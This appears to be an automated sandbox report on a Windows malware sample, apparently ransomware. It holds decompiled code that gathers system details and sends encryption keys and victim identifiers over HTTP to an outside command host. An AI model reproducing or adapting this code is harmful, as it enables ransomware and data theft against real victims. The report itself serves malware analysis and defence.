                                      • Part of subcall function 0F147B70: VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 0F147C01
                                      • Part of subcall function 0F147B70: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0F147C16
                                      • Part of subcall function 0F147B70: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F147C2C
                                    • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0F147988
                                    • GetDriveTypeW.KERNEL32(?), ref: 0F1479CF
                                    • lstrcatW.KERNEL32(?,?), ref: 0F1479F6
                                    • lstrcatW.KERNEL32(?,0F15030C), ref: 0F147A08
                                    • lstrcatW.KERNEL32(?,0F150380), ref: 0F147A12
                                    • GetDiskFreeSpaceW.KERNEL32(?,?,0F144810,?,00000000), ref: 0F147A28
                                    • lstrlenW.KERNEL32(?,?,00000000,0F144810,00000000,00000000,00000000,0F144810,00000000), ref: 0F147A70
                                    • wsprintfW.USER32 ref: 0F147A8A
                                    • lstrlenW.KERNEL32(?), ref: 0F147A98
                                    • wsprintfW.USER32 ref: 0F147AAC
                                    • lstrcatW.KERNEL32(?,0F1503A0), ref: 0F147ABF
                                    • lstrcatW.KERNEL32(?,0F1503A4), ref: 0F147ACB
                                    • lstrlenW.KERNEL32(?), ref: 0F147AE6
                                    • VirtualAlloc.KERNEL32(00000000,00000081,00003000,00000004), ref: 0F147B09
                                    • VirtualFree.KERNELBASE(?,00000000,00008000,00000000), ref: 0F147B30
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$Alloc$wsprintf$Freelstrcat$lstrlen$CloseErrorLastNameOpenQueryValue$AddressComputerCreateDirectoryDiskDriveExitHandleInfoInformationModuleNativeProcProcessSnapshotSpaceSystemToolhelp32TypeUserVolumeWindowslstrcmpi
                                    • String ID: i)w$%I64u$%I64u/$00000419$?:\$@$ARM$Control Panel\International$Domain$HARDWARE\DESCRIPTION\System\CentralProcessor\0$Identifier$Itanium$Keyboard Layout\Preload$LocaleName$ProcessorNameString$RtlComputeCrc32$SOFTWARE\Microsoft\Windows NT\CurrentVersion$SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion$SYSTEM\CurrentControlSet\services\Tcpip\Parameters$Unknown$WORKGROUP$error$ntdll.dll$productName$undefined$x64$x86
                                    • API String ID: 153366582-3138453034
                                    • Opcode ID: a59ac10d38607bfa00e80afb2142594abd71922887415ad0fdf6c233e4e7c8b6
                                    • Instruction ID: 12ee1d9e2695829ebe0ddd4845d2b1e92fa42be0ab1f53841d36ba39aa2e224c
                                    • Opcode Fuzzy Hash: a59ac10d38607bfa00e80afb2142594abd71922887415ad0fdf6c233e4e7c8b6
                                    • Instruction Fuzzy Hash: FE12B170A80305EFEB219FA0CC49FAABBB8FF88B05F100519FA51A61D1D7B5B564CB54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 92 f145860-f1458ec call f143bc0 call f147490 call f1472a0 VirtualAlloc 99 f145901-f145905 92->99 100 f1458ee-f1458f0 92->100 102 f145907-f145916 99->102 100->99 101 f1458f2-f1458ff 100->101 101->102 103 f14592f-f145931 102->103 104 f145918-f14591d 102->104 106 f145935-f14593e 103->106 104->103 105 f14591f-f14592d 104->105 105->106 107 f145940-f14594b 106->107 108 f14594d-f14594f 106->108 107->108 109 f145953-f14595b 107->109 108->109 110 f145961-f1459de CryptBinaryToStringA * 2 lstrlenA * 2 VirtualAlloc lstrlenA 109->110 111 f145d98-f145db9 VirtualFree call f147d70 109->111 113 f1459f5 110->113 114 f1459e0-f1459e2 110->114 115 f1459fd-f145a06 lstrlenA 113->115 114->113 117 f1459e4-f1459f3 114->117 118 f145a10 115->118 119 f145a08-f145a0e 115->119 117->115 120 f145a18-f145a22 lstrlenA 118->120 119->118 119->120 121 f145a24-f145a28 120->121 122 f145a4e-f145a55 lstrlenA 120->122 123 f145a30-f145a39 121->123 124 f145a57-f145a5f 122->124 125 f145a7e-f145ac7 lstrcatW lstrlenW call f1470a0 call f1435c0 122->125 127 f145a42-f145a48 lstrlenA 123->127 128 f145a3b-f145a3d 123->128 129 f145a60-f145a65 124->129 138 f145ad0-f145bc9 lstrcatW * 4 VirtualFree * 2 lstrcatW lstrlenW lstrlenA MultiByteToWideChar lstrcatW lstrlenW lstrlenA MultiByteToWideChar lstrcatW lstrlenW VirtualAlloc lstrlenW 125->138 139 f145ac9-f145aca ExitProcess 125->139 127->123 132 f145a4a 127->132 128->127 131 f145a3f-f145a41 128->131 133 f145a67-f145a69 129->133 134 f145a72-f145a7c lstrlenA 129->134 131->127 132->122 133->134 136 f145a6b-f145a6e 133->136 134->125 134->129 136->134 140 f145bd3 138->140 141 f145bcb-f145bcd 138->141 143 f145bd5-f145be7 lstrlenW 140->143 141->140 142 f145bcf-f145bd1 141->142 142->143 144 f145bf7-f145c18 lstrlenW VirtualAlloc 143->144 145 f145be9-f145bf1 VirtualFree 143->145 146 f145c2e-f145c67 call f145f00 CryptBinaryToStringA 144->146 147 f145c1a-f145c2b wsprintfA 144->147 145->144 150 f145c6f-f145c95 lstrlenA VirtualAlloc lstrlenA 146->150 151 f145c69 GetLastError 146->151 147->146 152 f145c97-f145c9d 150->152 153 f145c9f 150->153 151->150 152->153 154 f145ca7-f145cae lstrlenA 152->154 153->154 155 f145cd6-f145d0d lstrlenA MultiByteToWideChar call f1454f0 154->155 156 f145cb0-f145cb4 154->156 163 f145d5c-f145d62 155->163 164 f145d0f-f145d5b VirtualFree * 4 call f147d70 155->164 157 f145cb8-f145cbd 156->157 159 f145cbf-f145cc1 157->159 160 f145cca-f145cd4 lstrlenA 157->160 159->160 162 f145cc3-f145cc6 159->162 160->155 160->157 162->160 165 f145d64-f145d67 163->165 166 f145d69-f145d96 VirtualFree * 3 163->166 165->166 166->111
                                    C-Code - Quality: 82%
                                    			E0F145860(CHAR* __ecx, int __edx, BYTE* _a4, signed int _a8, long* _a12) {
                                    				char _v148;
                                    				char _v152;
                                    				void* _v156;
                                    				int _v160;
                                    				int _v164;
                                    				CHAR* _v172;
                                    				int _v176;
                                    				CHAR* _v184;
                                    				int _v192;
                                    				void* _v196;
                                    				CHAR* _v200;
                                    				CHAR* _v204;
                                    				WCHAR* _v208;
                                    				void* _v212;
                                    				void* _v216;
                                    				signed int _v220;
                                    				short* _v224;
                                    				void* _v228;
                                    				void* _v232;
                                    				void* _v236;
                                    				CHAR* _v240;
                                    				CHAR* _v268;
                                    				void* __esi;
                                    				CHAR* _t134;
                                    				void* _t136;
                                    				int _t146;
                                    				void* _t149;
                                    				int _t150;
                                    				signed int _t151;
                                    				void* _t153;
                                    				int _t159;
                                    				signed int _t167;
                                    				signed int _t171;
                                    				CHAR* _t178;
                                    				int _t179;
                                    				CHAR* _t182;
                                    				void* _t191;
                                    				long _t195;
                                    				void _t210;
                                    				int _t211;
                                    				intOrPtr _t215;
                                    				int _t216;
                                    				char _t217;
                                    				long _t226;
                                    				int _t239;
                                    				char* _t240;
                                    				void* _t244;
                                    				void* _t245;
                                    				void* _t248;
                                    				long _t250;
                                    				signed int _t254;
                                    				CHAR* _t256;
                                    				int _t259;
                                    				int _t260;
                                    				void* _t261;
                                    				void* _t266;
                                    				CHAR* _t267;
                                    				void* _t270;
                                    				CHAR* _t273;
                                    				long _t276;
                                    				CHAR* _t277;
                                    				char* _t279;
                                    				signed int _t282;
                                    				int _t283;
                                    				long _t286;
                                    				void* _t287;
                                    				void* _t288;
                                    				WCHAR* _t289;
                                    				WCHAR* _t290;
                                    				void* _t291;
                                    				WCHAR* _t292;
                                    				WCHAR* _t294;
                                    				int _t297;
                                    				long _t298;
                                    				void* _t299;
                                    				CHAR* _t300;
                                    				int _t302;
                                    				signed int _t303;
                                    				void* _t307;
                                    
                                    				_push(__ecx);
                                    				_push(1);
                                    				_push(__ecx);
                                    				_push(1);
                                    				_v184 = __ecx;
                                    				_v160 = __edx;
                                    				_push(1);
                                    				_push(__ecx);
                                    				_push(1);
                                    				_push(__ecx);
                                    				_push(1);
                                    				_push(__ecx);
                                    				_push(1);
                                    				_push(__ecx);
                                    				_push(1);
                                    				_t307 = (_t303 & 0xfffffff8) - 0x9c;
                                    				_push(1);
                                    				_push(__ecx);
                                    				_push(1);
                                    				E0F143BC0( &_v148);
                                    				E0F147490( &_v236, __edx); // executed
                                    				_t266 = E0F1472A0( &_v236);
                                    				_t282 = _a8 + __edx;
                                    				_t7 = _t282 + 8; // 0x8
                                    				_t226 = _t266 + _t7 * 8 << 3;
                                    				_t134 = VirtualAlloc(0, _t226, 0x3000, 0x40); // executed
                                    				_t259 = 0;
                                    				_v240 = _t134;
                                    				_v268 = _t134;
                                    				_t239 = 0x30 + (_t266 + _t282 * 4) * 8;
                                    				if(_t134 == 0 || _t239 >= _t226) {
                                    					_v176 = _t259;
                                    					_t267 = _t134;
                                    				} else {
                                    					_t267 = _t239 + _t134;
                                    					_v176 = _t134;
                                    					_v184 = _t267;
                                    					_t259 = _t239;
                                    				}
                                    				_t136 = 2 + _a8 * 8;
                                    				if(_v156 == 0) {
                                    					L7:
                                    					_t240 = 0;
                                    					_v172 = 0;
                                    				} else {
                                    					_t302 = _t259 + _t136;
                                    					if(_t302 >= _t226) {
                                    						goto L7;
                                    					} else {
                                    						_t240 = _t267;
                                    						_v172 = _t267;
                                    						_t267 =  &(_t267[_t136]);
                                    						_t259 = _t302;
                                    						_v184 = _t267;
                                    					}
                                    				}
                                    				_t283 = _v164;
                                    				if(_v156 == 0 || 2 + _t283 * 8 + _t259 >= _t226) {
                                    					_t267 = 0;
                                    					_v184 = 0;
                                    				}
                                    				if(_t240 == 0) {
                                    					L58:
                                    					VirtualFree(_v156, 0, 0x8000);
                                    					E0F147D70( &_v152);
                                    					return 1;
                                    				} else {
                                    					_t260 = _a8;
                                    					_v160 = _t260 + _t260;
                                    					CryptBinaryToStringA(_a4, _t260, 0x40000001, _t240,  &_v160);
                                    					_v176 = _t283 + _t283;
                                    					CryptBinaryToStringA(_v204, _t283, 0x40000001, _t267,  &_v176);
                                    					_t146 = lstrlenA(_t267);
                                    					_t286 = _t146 + lstrlenA(_v204) + 0x42;
                                    					_t149 = VirtualAlloc(0, _t286, 0x3000, 0x40); // executed
                                    					_v196 = _t149;
                                    					_v200 = _t149;
                                    					_v220 = 0;
                                    					_t150 = lstrlenA(_v204);
                                    					_t261 = _v196;
                                    					_t151 = _t150 + 1;
                                    					if(_t261 == 0 || _t151 >= _t286) {
                                    						_v212 = 0;
                                    					} else {
                                    						_v220 = _t151;
                                    						_v200 = _t261 + _t151;
                                    						_v212 = _t261;
                                    					}
                                    					_t153 = lstrlenA(_t267) + 1;
                                    					if(_v196 == 0 || _t153 + _v220 >= _t286) {
                                    						_v200 = 0;
                                    					}
                                    					_t287 = 0;
                                    					if(lstrlenA(_v204) != 0) {
                                    						_t279 = _v212;
                                    						do {
                                    							_t256 = _v204;
                                    							_t217 =  *((intOrPtr*)(_t287 + _t256));
                                    							if(_t217 != 0xa && _t217 != 0xd) {
                                    								 *_t279 = _t217;
                                    								_t279 = _t279 + 1;
                                    							}
                                    							_t287 = _t287 + 1;
                                    						} while (_t287 < lstrlenA(_t256));
                                    						_t267 = _v216;
                                    					}
                                    					_t288 = 0;
                                    					if(lstrlenA(_t267) != 0) {
                                    						_t254 = _v200;
                                    						_v220 = _t254;
                                    						do {
                                    							_t215 =  *((intOrPtr*)(_t288 + _t267));
                                    							if(_t215 != 0xa && _t215 != 0xd) {
                                    								 *_t254 = _t215;
                                    								_v220 = _t254 + 1;
                                    							}
                                    							_t288 = _t288 + 1;
                                    							_t216 = lstrlenA(_t267);
                                    							_t254 = _v220;
                                    						} while (_t288 < _t216);
                                    					}
                                    					_t289 = _v208;
                                    					lstrcatW(_t289, L"action=call&");
                                    					_t290 =  &(_t289[lstrlenW(_t289)]);
                                    					_v216 = _t290;
                                    					E0F1470A0( &_v184, _t290); // executed
                                    					_v224 = 0;
                                    					_v208 = 0;
                                    					_t159 = E0F1435C0( &_v224,  &_v208); // executed
                                    					if(_t159 == 0) {
                                    						ExitProcess(_t159); // executed
                                    					}
                                    					lstrcatW(_t290, L"&id=");
                                    					_t270 = _v220;
                                    					lstrcatW(_t290, _t270);
                                    					lstrcatW(_t290, L"&subid=");
                                    					_t291 = _v204;
                                    					lstrcatW(_v216, _t291);
                                    					VirtualFree(_t270, 0, 0x8000);
                                    					VirtualFree(_t291, 0, 0x8000);
                                    					_t292 = _v216;
                                    					lstrcatW(_t292, L"&pub_key=");
                                    					_t167 = lstrlenW(_t292);
                                    					MultiByteToWideChar(0xfde9, 0, _v212, 0xffffffff,  &(_t292[_t167]), lstrlenA(_v212));
                                    					_t294 = _v216;
                                    					lstrcatW(_t294, L"&priv_key=");
                                    					_t171 = lstrlenW(_t294);
                                    					_t273 = _v200;
                                    					MultiByteToWideChar(0xfde9, 0, _t273, 0xffffffff,  &(_t294[_t171]), lstrlenA(_t273));
                                    					lstrcatW(_v216, L"&version=2.3.1r");
                                    					_t276 = (lstrlenW(_v208) << 4) + 0x12;
                                    					_v216 = VirtualAlloc(0, _t276, 0x3000, 0x40);
                                    					_t244 = 2 + lstrlenW(_v208) * 8;
                                    					_t178 = _v216;
                                    					if(_t178 == 0 || _t244 >= _t276) {
                                    						_t277 = 0;
                                    					} else {
                                    						_t277 = _t178;
                                    					}
                                    					_t179 = lstrlenW(_v208);
                                    					_t245 =  *0xf152a78; // 0x0
                                    					_v220 = _t179;
                                    					if(_t245 != 0) {
                                    						VirtualFree(_t245, 0, 0x8000);
                                    					}
                                    					_t182 = VirtualAlloc(0, lstrlenW(L"popkadurak") + 2, 0x3000, 4);
                                    					 *0xf152a78 = _t182;
                                    					if(_t182 != 0) {
                                    						wsprintfA(_t182, "%S", L"popkadurak");
                                    						_t307 = _t307 + 0xc;
                                    					}
                                    					_t297 = _v220 + _v220;
                                    					E0F145F00(_v208, _t297, _t297);
                                    					_v192 = _v220 * 8;
                                    					if(CryptBinaryToStringA(_v208, _t297, 0x40000001, _t277,  &_v192) == 0) {
                                    						GetLastError();
                                    					}
                                    					_t104 = lstrlenA(_t277) + 2; // 0x2
                                    					_t298 = _t104;
                                    					_v228 = VirtualAlloc(0, _t298, 0x3000, 0x40);
                                    					_t106 = lstrlenA(_t277) + 1; // 0x1
                                    					_t248 = _t106;
                                    					_t191 = _v228;
                                    					if(_t191 == 0) {
                                    						L46:
                                    						_v216 = 0;
                                    					} else {
                                    						_v216 = _t191;
                                    						if(_t248 >= _t298) {
                                    							goto L46;
                                    						}
                                    					}
                                    					_t299 = 0;
                                    					if(lstrlenA(_t277) != 0) {
                                    						_v236 = _v216;
                                    						do {
                                    							_t210 =  *((intOrPtr*)(_t299 + _t277));
                                    							if(_t210 != 0xa && _t210 != 0xd) {
                                    								 *_t248 = _t210;
                                    								_v236 = _t248 + 1;
                                    							}
                                    							_t299 = _t299 + 1;
                                    							_t211 = lstrlenA(_t277);
                                    							_t248 = _v236;
                                    						} while (_t299 < _t211);
                                    					}
                                    					_t300 = _v216;
                                    					MultiByteToWideChar(0xfde9, 0, _t300, 0xffffffff, _v224, lstrlenA(_t300));
                                    					_v236 = 0;
                                    					_t195 = E0F1454F0(_t300,  &_v236, _t248, 1);
                                    					if(_t195 != 0) {
                                    						_t250 = _v236;
                                    						if(_t250 != 0) {
                                    							 *_a12 = _t250;
                                    						}
                                    						VirtualFree(_v228, 0, 0x8000);
                                    						VirtualFree(_v232, 0, 0x8000);
                                    						VirtualFree(_v212, 0, 0x8000);
                                    						goto L58;
                                    					} else {
                                    						VirtualFree(_v228, _t195, 0x8000);
                                    						VirtualFree(_v232, 0, 0x8000);
                                    						VirtualFree(_v212, 0, 0x8000);
                                    						VirtualFree(_v204, 0, 0x8000);
                                    						E0F147D70( &_v200);
                                    						return 0;
                                    					}
                                    				}
                                    			}


















































































                                    0x0f14586f
                                    0x0f145870
                                    0x0f145872
                                    0x0f145873
                                    0x0f145878
                                    0x0f14587e
                                    0x0f145882
                                    0x0f145884
                                    0x0f145885
                                    0x0f145887
                                    0x0f145888
                                    0x0f14588a
                                    0x0f14588b
                                    0x0f14588d
                                    0x0f14588e
                                    0x0f145890
                                    0x0f145893
                                    0x0f145895
                                    0x0f145896
                                    0x0f14589f
                                    0x0f1458a8
                                    0x0f1458b9
                                    0x0f1458bb
                                    0x0f1458c4
                                    0x0f1458ca
                                    0x0f1458d0
                                    0x0f1458d6
                                    0x0f1458d8
                                    0x0f1458dc
                                    0x0f1458e3
                                    0x0f1458ec
                                    0x0f145901
                                    0x0f145905
                                    0x0f1458f2
                                    0x0f1458f2
                                    0x0f1458f5
                                    0x0f1458f9
                                    0x0f1458fd
                                    0x0f1458fd
                                    0x0f14590f
                                    0x0f145916
                                    0x0f14592f
                                    0x0f14592f
                                    0x0f145931
                                    0x0f145918
                                    0x0f145918
                                    0x0f14591d
                                    0x00000000
                                    0x0f14591f
                                    0x0f14591f
                                    0x0f145921
                                    0x0f145925
                                    0x0f145927
                                    0x0f145929
                                    0x0f145929
                                    0x0f14591d
                                    0x0f14593a
                                    0x0f14593e
                                    0x0f14594d
                                    0x0f14594f
                                    0x0f14594f
                                    0x0f14595b
                                    0x0f145d98
                                    0x0f145da3
                                    0x0f145da9
                                    0x0f145db9
                                    0x0f145961
                                    0x0f145961
                                    0x0f14596d
                                    0x0f145980
                                    0x0f145985
                                    0x0f145999
                                    0x0f1459a2
                                    0x0f1459b6
                                    0x0f1459bb
                                    0x0f1459c5
                                    0x0f1459c9
                                    0x0f1459cd
                                    0x0f1459d5
                                    0x0f1459d7
                                    0x0f1459db
                                    0x0f1459de
                                    0x0f1459f5
                                    0x0f1459e4
                                    0x0f1459e7
                                    0x0f1459eb
                                    0x0f1459ef
                                    0x0f1459ef
                                    0x0f145a00
                                    0x0f145a06
                                    0x0f145a10
                                    0x0f145a10
                                    0x0f145a1c
                                    0x0f145a22
                                    0x0f145a24
                                    0x0f145a30
                                    0x0f145a30
                                    0x0f145a34
                                    0x0f145a39
                                    0x0f145a3f
                                    0x0f145a41
                                    0x0f145a41
                                    0x0f145a43
                                    0x0f145a46
                                    0x0f145a4a
                                    0x0f145a4a
                                    0x0f145a4f
                                    0x0f145a55
                                    0x0f145a57
                                    0x0f145a5b
                                    0x0f145a60
                                    0x0f145a60
                                    0x0f145a65
                                    0x0f145a6b
                                    0x0f145a6e
                                    0x0f145a6e
                                    0x0f145a73
                                    0x0f145a74
                                    0x0f145a76
                                    0x0f145a7a
                                    0x0f145a60
                                    0x0f145a7e
                                    0x0f145a8e
                                    0x0f145a9b
                                    0x0f145a9f
                                    0x0f145aa3
                                    0x0f145aac
                                    0x0f145ab8
                                    0x0f145ac0
                                    0x0f145ac7
                                    0x0f145aca
                                    0x0f145aca
                                    0x0f145ad6
                                    0x0f145ad8
                                    0x0f145ade
                                    0x0f145aea
                                    0x0f145af0
                                    0x0f145af9
                                    0x0f145b0d
                                    0x0f145b17
                                    0x0f145b19
                                    0x0f145b23
                                    0x0f145b30
                                    0x0f145b4a
                                    0x0f145b50
                                    0x0f145b5a
                                    0x0f145b61
                                    0x0f145b63
                                    0x0f145b79
                                    0x0f145b88
                                    0x0f145ba6
                                    0x0f145bb6
                                    0x0f145bbc
                                    0x0f145bc3
                                    0x0f145bc9
                                    0x0f145bd3
                                    0x0f145bcf
                                    0x0f145bcf
                                    0x0f145bcf
                                    0x0f145bd9
                                    0x0f145bdb
                                    0x0f145be1
                                    0x0f145be7
                                    0x0f145bf1
                                    0x0f145bf1
                                    0x0f145c0b
                                    0x0f145c11
                                    0x0f145c18
                                    0x0f145c25
                                    0x0f145c2b
                                    0x0f145c2b
                                    0x0f145c36
                                    0x0f145c3b
                                    0x0f145c4b
                                    0x0f145c67
                                    0x0f145c69
                                    0x0f145c69
                                    0x0f145c79
                                    0x0f145c79
                                    0x0f145c86
                                    0x0f145c8c
                                    0x0f145c8c
                                    0x0f145c8f
                                    0x0f145c95
                                    0x0f145c9f
                                    0x0f145c9f
                                    0x0f145c97
                                    0x0f145c97
                                    0x0f145c9d
                                    0x00000000
                                    0x00000000
                                    0x0f145c9d
                                    0x0f145ca8
                                    0x0f145cae
                                    0x0f145cb4
                                    0x0f145cb8
                                    0x0f145cb8
                                    0x0f145cbd
                                    0x0f145cc3
                                    0x0f145cc6
                                    0x0f145cc6
                                    0x0f145ccb
                                    0x0f145ccc
                                    0x0f145cce
                                    0x0f145cd2
                                    0x0f145cb8
                                    0x0f145cd6
                                    0x0f145cec
                                    0x0f145cf9
                                    0x0f145d03
                                    0x0f145d0d
                                    0x0f145d5c
                                    0x0f145d62
                                    0x0f145d67
                                    0x0f145d67
                                    0x0f145d7b
                                    0x0f145d89
                                    0x0f145d96
                                    0x00000000
                                    0x0f145d0f
                                    0x0f145d20
                                    0x0f145d2e
                                    0x0f145d3b
                                    0x0f145d48
                                    0x0f145d4e
                                    0x0f145d5b
                                    0x0f145d5b
                                    0x0f145d0d

                                    APIs
                                      • Part of subcall function 0F143BC0: GetProcessHeap.KERNEL32(?,?,0F144807,00000000,?,00000000,00000000), ref: 0F143C5C
                                      • Part of subcall function 0F147490: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0F1474B7
                                      • Part of subcall function 0F147490: GetUserNameW.ADVAPI32(00000000,?), ref: 0F1474C8
                                      • Part of subcall function 0F147490: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0F1474E6
                                      • Part of subcall function 0F147490: GetComputerNameW.KERNEL32 ref: 0F1474F0
                                      • Part of subcall function 0F147490: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F147510
                                      • Part of subcall function 0F147490: wsprintfW.USER32 ref: 0F147551
                                      • Part of subcall function 0F147490: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F14756E
                                      • Part of subcall function 0F147490: RegOpenKeyExW.KERNEL32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0F147592
                                      • Part of subcall function 0F147490: RegQueryValueExW.KERNEL32(00000000,LocaleName,00000000,00000000,0F144810,?), ref: 0F1475B6
                                      • Part of subcall function 0F147490: RegCloseKey.KERNEL32(00000000), ref: 0F1475D2
                                      • Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F1472F2
                                      • Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F1472FD
                                      • Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F147313
                                      • Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F14731E
                                      • Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F147334
                                      • Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F14733F
                                      • Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F147355
                                      • Part of subcall function 0F1472A0: lstrlenW.KERNEL32(0F144B36,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F147360
                                      • Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F147376
                                      • Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F147381
                                      • Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F147397
                                      • Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F1473A2
                                      • Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F1473C1
                                      • Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F1473CC
                                    • VirtualAlloc.KERNEL32(00000000,00000008,00003000,00000040,00000001,00000000,00000001,00000001,00000000,00000001), ref: 0F1458D0
                                    • CryptBinaryToStringA.CRYPT32(00000000,00000000,40000001,00000000,?), ref: 0F145980
                                    • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 0F145999
                                    • lstrlenA.KERNEL32(00000000), ref: 0F1459A2
                                    • lstrlenA.KERNEL32(?), ref: 0F1459AA
                                    • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 0F1459BB
                                    • lstrlenA.KERNEL32(?), ref: 0F1459D5
                                    • lstrlenA.KERNEL32(00000000), ref: 0F1459FE
                                    • lstrlenA.KERNEL32(?), ref: 0F145A1E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen$AllocVirtual$BinaryCryptNameString$CloseComputerHeapOpenProcessQueryUserValuewsprintf
                                    • String ID: &id=$&priv_key=$&pub_key=$&subid=$&version=2.3.1r$action=call&$popkadurak
                                    • API String ID: 1618292170-4215222798
                                    • Opcode ID: 591842b9fbd390e465997e08142e4e6aeb56bd34096973b32ba5e6030f8bf078
                                    • Instruction ID: 778b8789206fa4ef8d66b013003fbc1b7361d5dc6ab9915c34ca30cb2cf0685a
                                    • Opcode Fuzzy Hash: 591842b9fbd390e465997e08142e4e6aeb56bd34096973b32ba5e6030f8bf078
                                    • Instruction Fuzzy Hash: 94F1CC71248301AFE710DF24DC85B6BBBAAEFC8B14F04091CF585A7291DB74F9198B66
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    C-Code - Quality: 100%
                                    			E0F148050(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16, void* _a20, intOrPtr _a24, WCHAR* _a36, WCHAR* _a40, long _a44) {
                                    				long _v12;
                                    				void* _v16;
                                    				void* _v20;
                                    				intOrPtr _v24;
                                    				intOrPtr _v28;
                                    				intOrPtr _v32;
                                    				intOrPtr _v36;
                                    				intOrPtr _v40;
                                    				intOrPtr _v44;
                                    				intOrPtr _v48;
                                    				intOrPtr _v52;
                                    				intOrPtr _v56;
                                    				intOrPtr _v60;
                                    				intOrPtr _v64;
                                    				short _v68;
                                    				void* _t38;
                                    				void* _t40;
                                    				WCHAR* _t41;
                                    				long _t54;
                                    				long _t59;
                                    				WCHAR* _t62;
                                    				void* _t63;
                                    				void* _t64;
                                    				void* _t65;
                                    				void* _t67;
                                    
                                    				_t64 = __ecx;
                                    				_t38 =  *(__ecx + 4);
                                    				if(_t38 != 0) {
                                    					InternetCloseHandle(_t38);
                                    				}
                                    				E0F147E40(_t64); // executed
                                    				_t40 = InternetConnectW( *(_t64 + 4), _a4, 0x50, 0, 0, 3, 0, 0); // executed
                                    				_t65 = _t40;
                                    				_v12 = 0;
                                    				_v16 = _t65;
                                    				if(_t65 != 0) {
                                    					_t41 = VirtualAlloc(0, 0x2800, 0x3000, 0x40); // executed
                                    					_t62 = _t41;
                                    					_v20 = _t62;
                                    					wsprintfW(_t62, L"%s", _a8);
                                    					_t63 = HttpOpenRequestW(_t65, _a36, _t62, L"HTTP/1.1", 0, 0, 0x8404f700, 0);
                                    					if(_t63 != 0) {
                                    						_v68 = 0x6f0048;
                                    						_v64 = 0x740073;
                                    						_v60 = 0x20003a;
                                    						_v56 = 0x6f0070;
                                    						_v52 = 0x69006c;
                                    						_v48 = 0x690074;
                                    						_v44 = 0x720061;
                                    						_v40 = 0x6d006f;
                                    						_v36 = 0x6e0061;
                                    						_v32 = 0x2e0061;
                                    						_v28 = 0x690062;
                                    						_v24 = 0x74;
                                    						if(HttpAddRequestHeadersW(_t63,  &_v68, 0xffffffff, 0) != 0) {
                                    							if(HttpSendRequestW(_t63, _a40, _a44, _a12, _a16) == 0) {
                                    								GetLastError();
                                    							} else {
                                    								_t67 = _a20;
                                    								_t59 = _a24 - 1;
                                    								_a4 = 0;
